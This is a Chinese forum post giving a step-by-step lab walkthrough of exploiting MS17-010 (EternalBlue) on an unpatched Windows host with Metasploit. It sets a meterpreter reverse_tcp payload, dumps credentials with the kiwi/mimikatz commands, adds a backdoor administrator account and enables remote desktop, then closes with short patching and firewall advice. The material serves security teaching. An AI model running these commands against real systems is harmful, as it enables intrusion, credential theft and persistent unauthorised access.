论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
软件与程序人生
›
后端开发
›
.Net
›
MS17-010永恒之蓝漏洞利用
MS17-010永恒之蓝漏洞利用
前进之路
金牌会员
|
2022-8-26 05:23:09
|
显示全部楼层
|
阅读模式
楼主
主题
845
|
帖子
845
|
积分
2535
MS17-010永恒之蓝漏洞利用
原理
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。SMB服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无。漏洞原理的深入研究,请参考:(
https://blog.csdn.net/luoshenwei3533/article/details/82931999
)
实验前准备
攻击ip:192.168.200.130
被攻击ip:192.168.200.101 开启了445端口(默认是开启的),未打漏洞补丁,关闭防火墙
二者能够相互ping通
复制代码
步骤
1、启动MSF
msfconsole
复制代码
<br><img src="https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712214411625-511281646.png" alt="" loading="lazy">
复制代码
2、ms17_010模块使用过程
search ms17_010 查找相应的漏洞模块
use exploit/windows/smb/ms17_010_psexec 加载模块
set RHOSTS 192.168.200.101 设置攻击目标
check 进行检测,确认是否存在ms17_010漏洞
set payload windows/meterpreter/reverse_tcp 加载payload
set LHOST 192.168.200.130 设置本地IP
show options 查看模块相关参数
run 攻击
复制代码
(1)查找相应的漏洞模块
(2)加载模块并设置目标
我们这里使用第1个,即”exploit/windows/smb/ms17_010_psexec“模块,并设置RHOSTS为被攻击IP
使用check命令检测一下是否存在ms17_010漏洞。检测时,会自动加载auxiliary/scanner/smb/smb_ms17_010模块,可以看到,被攻击目标是存在这个漏洞的。
(3)加载payload
这里使用windows/meterpreter/reverse_tcp作为攻击payload。
攻击前,再用show options命令检查一下设置是否正确。
(4)攻击
3、漏洞利用
(1) 查看系统信息 sysinfo
(2) 查看当前用户的权限 getuid
(3))获取目标系统权限 shell
(4)获取目标主机用户以及密码,需要使用system权限,如果是在administrator下,直接使用 getsystem 即可
load kiwi 加载kiwi模块
help kiwi 查看kiwi模块帮助
复制代码
creds_all 查看用户,密码,密码对应hash值等
kiwi具体命令
load kiwi
creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码
复制代码
(5)开启目标远程
开启目标远程,并创建一个test帐户
>>方法一
meterpreter > run post/windows/manage/enable_rdp username="test" password="123456"
复制代码
验证
>>方法二
shell <br>net user lfn 123456 /add 创建用户
net localgroup administrators lfn /add 添加管理员权限
复制代码
>>ps如果目标机器没有开启远程桌面服务,使用注册表进行打开
C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
复制代码
使用刚才创建的用户和密码进行远程,进行远程控制。
rdesktop 192.168.200.101 -u test -p 123456
复制代码
防护措施
关闭445等高危端口
配置防火墙,安装防护软件
安装补丁
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
前进之路
金牌会员
这个人很懒什么都没写!
楼主热帖
低代码平台 - 危险的赌注
后台性能测试规范
Redis常见使用场景
小小项目-博客系统 - 服务器版本 - jav ...
Docker 基础 - 1
实用五步法教会你指标体系的设计与加工 ...
泛型通配符?(问号)简介说明 ...
端午假期整理了仿天猫H5 APP项目vue.js ...
MacOS升级12.3后,Jenkins打包环境问题 ...
日志技术简介
标签云
存储
挺好的
服务器
快速回复
返回顶部
返回列表